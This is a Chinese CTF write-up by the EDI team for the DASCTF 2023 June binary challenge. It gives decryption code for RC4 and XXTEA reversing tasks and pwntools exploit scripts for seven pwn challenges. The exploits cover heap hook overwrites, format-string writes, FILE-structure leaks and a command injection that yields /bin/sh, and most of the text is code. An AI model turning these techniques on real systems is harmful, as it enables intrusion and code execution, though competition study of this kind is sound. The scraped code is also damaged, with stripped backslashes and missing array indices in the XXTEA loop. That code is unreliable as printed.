DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC

admin 2024年11月9日23:15:43评论3 views字数 13644阅读45分28秒阅读模式

EDI

JOIN US ▶▶▶

招新

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。

欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn 方向的师傅)有意向的师傅请联系邮箱root@edisec.net、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。

点击蓝字 ·  关注我们

01

Re

1

careful

沙箱跑一下

DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC

2

babyRe

API反调试绕过+SMC+去花指令+RC4魔改

#include <stdio.h>#include <string.h>void rc4_init(unsigned char*s,unsigned char*key,unsigned long len){ int i=0; int j=0; unsigned char k[256]={}; unsigned char temp = 0; for(i=0;i<256;i++) {  s[i]=i;          k[i]=key[i%0xa];    } for(i=0;i<256;i++) {  j=(2*j+s[i]+k[i])%256;      temp=s[i];  s[i]=s[j];  s[j]=temp;   }}void rc4_crypt(unsigned char*s,unsigned char*data,unsigned long len){ int i=0,j=0,t=0; unsigned long k=0; unsigned char temp; for(k=0;k<len;k++) {  data[k] -= k % 0xD ;                     i=(i+j)%256;            j=(j+s[i])%256;            temp=s[i];  s[i]=s[j];  s[j]=temp;               t=(s[i]+j +s[j])%256;       data[k]^=s[t];           }}int main(){ unsigned char s[256]={0}; char key[10] = {0x5d,0x42,0x62,0x29,0x03,0x36,0x47,0x41,0x15,0x36}; char data[45]={0xf7,0x2e,0x34,0xf0,0x72,0xcf,0x5e,0x0a,0xbb,0xec,0xb1,0x2b,0x70,0x88,0x88,0xed,0x46,0x38,0xdb,0xda,0x6c,0xbd,0xd4,0x06,0x77,0xf2,0xcf,0x56,0x88,0xc6,0x31,0xd2,0xb7,0x5a,0xc1,0x42,0xb0,0xf4,0x48,0x37,0xf5,0x2c,0xf5,0x58}; unsigned long len = strlen(data); rc4_init(s,(unsigned char*)key,len);//初始化得到s    for (int i = 0; i < sizeof(s); i++) {        printf("%02X ", s[i]);    } rc4_crypt(s,(unsigned char*)data,len);//解密 unsigned long len1 = strlen(data); printf("解密后为:%s,%lu",(unsigned char*)data,len1); return 0;}

3

ez_exe

python3.11反编译+XXTEA

import ctypesfrom time import *from ctypes import *from ctypes import wintypesfrom hashlib import md5class _STARTUPINFO(Structure):    _fields_ = [        ('cb', c_ulong),        ('lpReserved', c_char_p),        ('lpDesktop', c_char_p),        ('lpTitle', c_char_p),        ('dwX', c_ulong),        ('dwY', c_ulong),        ('dwXSize', c_ulong),        ('dwYSize', c_ulong),        ('dwXCountChars', c_ulong),        ('dwYCountChars', c_ulong),        ('dwFillAttribute', c_ulong),        ('dwFlags', c_ulong),        ('wShowWindow', c_ushort),        ('cbReserved2', c_ushort),        ('lpReserved2', c_char_p),        ('hStdInput', c_ulong),        ('hStdOutput', c_ulong),        ('hStdError', c_ulong)]class _PROCESS_INFORMATION(Structure):    _fields_ = [        ('hProcess', c_void_p),        ('hThread', c_void_p),        ('dwProcessId', c_ulong),        ('dwThreadId', c_ulong)]StartupInfo = _STARTUPINFO()ProcessInfo = _PROCESS_INFORMATION()key1 = bytes(md5(b'bin1bin1bin1').hexdigest().encode())file = open('./task 2/bin1', 'rb').read()arr = [key1[i % len(key1)] ^ file[i] for i in range(len(file))] //pycdc没去识别这个序列,要自己看字节码分析open('bin3', 'wb').write(bytes(arr))

用key bin2bin2bin2去解bin2

#include <stdio.h>#include <stdlib.h>#define delta 0x7937B99Eint main(){    unsigned int v[11] = {0xCC45699D, 0x683D5352, 0xB8BB71A0, 0xD3817AD, 0x7547E79E, 0x4BDD8C7C, 0x95E25A81, 0xC4525103, 0x7049B46F, 0x5417F77C,0x65567138};    unsigned int key[4] = {0x00004B5F, 0x0000DEAD, 0x000011ED, 0x0000B3CC};    unsigned int sum = 0;    unsigned int y,z,p,rounds,e;    int n = 11;    int i = 0;    rounds = 52/n;      y = v[0];    sum = rounds * delta ;     do     {        e = sum >> 2 & 3;        for(p=n-1;p>0;p--)        {            z = v

; v

-= ((((z>>5)^(y<<2))+((y>>3)^(z<<4))) ^ ((key[(p&3)^e]^z)+(y ^ sum))); y = v

; } z = v[n-1]; v[0] -= (((key[(p^e)&3]^z)+(y ^ sum)) ^ (((y<<2)^(z>>5))+((z<<4)^(y>>3)))); y = v[0]; sum = sum-delta ; }while(--rounds); for(i=0;i<n;i++) { printf("%c%c%c%c",*((char*)&v[i]+0),*((char*)&v[i]+1),*((char*)&v[i]+2),*((char*)&v[i]+3)); //printf("%c%c%c%c",*((char*)&v[i]+3),*((char*)&v[i]+2),*((char*)&v[i]+1),*((char*)&v[i]+0)); } return 0;}

02

Pwn

1

easynote

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch    gdb_text='''      telescope $rebase(0x202040) 16      '''    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=remote('node4.buuoj.cn',29223)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('./libc-2.23.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)    def choice(a):      io.sendlineafter('5. exitn',str(a))    def add(a,b):      choice(1)      io.sendlineafter('--->n',str(a))      io.sendafter('--->n',b)    def edit(a,c,b):      choice(2)      io.sendlineafter('--->n',str(a))      io.sendlineafter('--->n',str(c))      io.sendafter('--->n',b)    def show(a):      choice(4)      io.sendlineafter('--->n',str(a))    def delete(a):      choice(3)      io.sendlineafter('--->n',str(a))    add(0xf8,'aaa')    add(0x68,'aaa')    delete(0)    show(0)    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    system_addr=libc.sym['system']    free_hook_addr=libc.sym['__free_hook']    delete(1)    edit(1,0x8,p64(libc.sym['__malloc_hook']-0x23))    add(0x68,'aaa')    add(0x68,'x00'*0x13+p64(libc_base+0xf03a4))    delete(0)    # delete(0)    success('libc_base:'+hex(libc_base))    # success('heap_base:'+hex(heap_base))    # gdb_attach(io,gdb_text)    io.interactive()  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue

2

fooooood

#coding:utf-8from pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'elf=ELF(elfelf)context.arch=elf.archgdb_text='''b *$rebase(0xB27)  '''if len(sys.argv)==1 :  io=process(elfelf)  gdb_open=1  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]elif sys.argv[1]=='2' :  io=process(elfelf)  gdb_open=0  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :  io=remote('node4.buuoj.cn',29176)  gdb_open=0  libc=ELF('./libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):  if gdb_open==1 :    gdb.attach(io,a)io.sendlineafter('name:','keer')def go(a):  io.sendlineafter('favourite food: ',a)go('%8$p%9$p%11$p')io.recvuntil('You like ')elf_base=int(io.recv(14),16)-0xb60libc_base=int(io.recv(14),16)-libc.sym['__libc_start_main']-240libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']printf_got=libc_base+0x202028stack_addr=(int(io.recv(14),16)-0x3518+0x3424)&0xffffpay='%'+str(stack_addr)+'c%11$hn'go(pay)go('%255'+'c%37$hhn')def fmt(addr,value):  pay='%'+str(addr&0xffff)+'c%11$hn'  go(pay)  off_1=(value)&0xff  go('%'+str(off_1)+'c%37$hhn')  for i in range(5):    pay='%'+str((addr+1+i)&0xff)+'c%11$hhn'    go(pay)    off_1=(value>>((i+1)*8))&0xff    go('%'+str(off_1)+'c%37$hhn')fmt(stack_addr+0xc+8,libc_base+one_gadgaet[3])for i in range(248):  io.sendline('')success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()

3

Candy_Shop

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch    gdb_text='''      telescope $rebase(0x202040) 16      '''    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=remote('node4.buuoj.cn',27065)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('./libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)    def choice(a):      io.sendlineafter('option: ',a)    def add(a,b,c):      choice('b')      io.sendlineafter('Which one you want to bye: ',a)      io.sendlineafter(': ',b)      io.sendafter(': ',c)    def edit(a,b):      choice(2)      io.sendlineafter('Index:',str(a))      io.sendafter('content:',b)    def show(a):      choice('g')      io.sendlineafter(': n',a)    def delete(a):      choice(4)      io.sendlineafter('Index:',str(a))    show('%31$p')    io.recvuntil('0x')    libc_base=int(io.recv(12),16)-libc.sym['__libc_start_main']-128    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    system_addr=libc.sym['system']    free_hook_addr=libc.sym['__free_hook']    add('t','-2','a'*6+'99999n')    add('t','-10',p64(libc.sym['puts'])[0x2:]+p64(libc.sym['printf'])+p64(system_addr)[:5])    add('t','-9','x7fn')    add('t','0','/bin/shn')    success('libc_base:'+hex(libc_base))    # success('heap_base:'+hex(heap_base))    gdb_attach(io,gdb_text)    io.interactive()  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue

4

Approoooooooaching

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./bf'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch    gdb_text='''      b *$rebase(0x15B9)      '''    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    else :      clibc=CDLL('/home/keer/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc.so.6')      io=remote('139.155.140.235',9999)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)    def choice(a):      io.sendlineafter('choice: n',str(a))    def add(a,b):      choice(1)      io.sendlineafter('size: ',str(a))      choice(2)      io.sendafter('text: ',b)    def bf():      choice(3)    def run():      choice(4)    add(0xfff,'ix'*0x4+'yyy')    gdb_attach(io,gdb_text)    bf()    io.sendafter('choice: n','4n')    io.send('xE0')    # success('heap_base:'+hex(heap_base))    io.interactive()  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue

5

server

通过动调可以发现access校验的路径是有限长度,可以把后面的.key给顶掉,然后写入过长的字符串会覆盖到命令注入读取的内容,因此只要在最后执行/bin/sh #,并通过单引号闭合参数即可。

#!usr/bin/env python #coding=utf-8from pwn import *from ctypes import CDLLcontext(arch = 'amd64',os = 'linux',log_level = 'debug')elf = ELF('./pwn_7')DEBUG = 0if DEBUG:    gdbOpen = 1    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')    p = process('./pwn_7')else:    gdbOpen = 0    ip = 'node4.buuoj.cn'    port = 25599    p = remote(ip, port)    clibc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')def debug(info="b main"):    if gdbOpen == 1:        gdb.attach(p, info)        #gdb.attach(p, "b *$rebase(0x)")debug('b *$rebase(0x0000000000001495)')p.sendlineafter(b'>> ', b'1')p.sendlineafter(b'admin : n', b'../../../../../././bin/sh #')p.sendlineafter(b'>> ', b'2')p.sendlineafter(b'add : n', b"'")p.interactive()

6

can_you_find_me

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'#context.arch='amd64'while True :  try :    elf=ELF(elfelf)    context.arch=elf.arch    gdb_text='''      telescope $rebase(0x202040) 16      '''    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=remote('node4.buuoj.cn',27065)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)    def choice(a):      io.sendlineafter('choice:',str(a))    def add(a,b):      choice(1)      io.sendlineafter('Size:',str(a))      io.sendafter('Data:',b)    def edit(a,b):      choice(2)      io.sendlineafter('Index:',str(a))      io.sendafter('content:',b)    def show(a):      choice(3)      io.sendlineafter('Index:',str(a))    def delete(a):      choice(2)      io.sendlineafter('Index:',str(a))    add(0x4f0,'aaan')    add(0xf0,'aaan')    add(0xf0,'aaan')    add(0x1f0,'aaan')    add(0x4f0,'aaan')    add(0xf0,'aaan')    delete(0)    delete(3)    add(0x1f8,'x00'*0x1f0+p64(0x900))    delete(4)    delete(1)    delete(0)    add(0x4f0,'n')    add(0x1e0,'x60x77n')    add(0xf0,'aaan')    add(0xf0,p64(0xfbad1887)+p64(0)*3+'xc8'+'n')    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    system_addr=libc.sym['system']    free_hook_addr=libc.sym['__free_hook']    add(0x110,'/bin/shx00'+p64(0x1f8)+p64(free_hook_addr)+'n')    add(0x1f0,'/bin/shx00n')    add(0x1f0,p64(system_addr)+'n')    delete(6)    success('libc_base:'+hex(libc_base))    # success('heap_base:'+hex(heap_base))    gdb_attach(io,gdb_text)    io.interactive()  except Exception as e:    io.close()    continue  else:    continue

7

matchmaking platform

#coding:utf-8from pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'elf=ELF(elfelf)context.arch=elf.archgdb_text='''  '''if len(sys.argv)==1 :  io=process(elfelf)  gdb_open=1  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]elif sys.argv[1]=='2' :  io=process(elfelf)  gdb_open=0  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :  io=remote('node4.buuoj.cn',25131)  gdb_open=0  libc=ELF('/home/keer/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc.so.6')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):  if gdb_open==1 :    gdb.attach(io,a)# io.sendafter('>> ','a'*0x80+'x60')# io.sendafter('>> ','x18n')# io.sendafter('>> ','a'*0x80+'x60')# io.sendafter('>> ','x18n')io.sendafter('>> ','a'*0x80+'x80')io.sendafter('>> ',p64(0xfbda1887)+p64(0)*3+'x08n')libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['_IO_2_1_stdin_']libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']io.sendafter('>> ','a'*0x80+'x60')io.sendafter('>> ',p64(free_hook_addr)+'x05n')io.sendafter('>> ','a'*0x80+'x60')io.sendafter('>> ',p64(system_addr)+'n')io.sendafter('>> ','a'*0x80+'xc8')io.sendafter('>> ','/bin/shx00'+'n')# success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()

EDI安全

DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

原文始发于微信公众号(EDI安全):DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月9日23:15:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEChttps://cn-sec.com/archives/1792115.html

发表评论

匿名网友 填写信息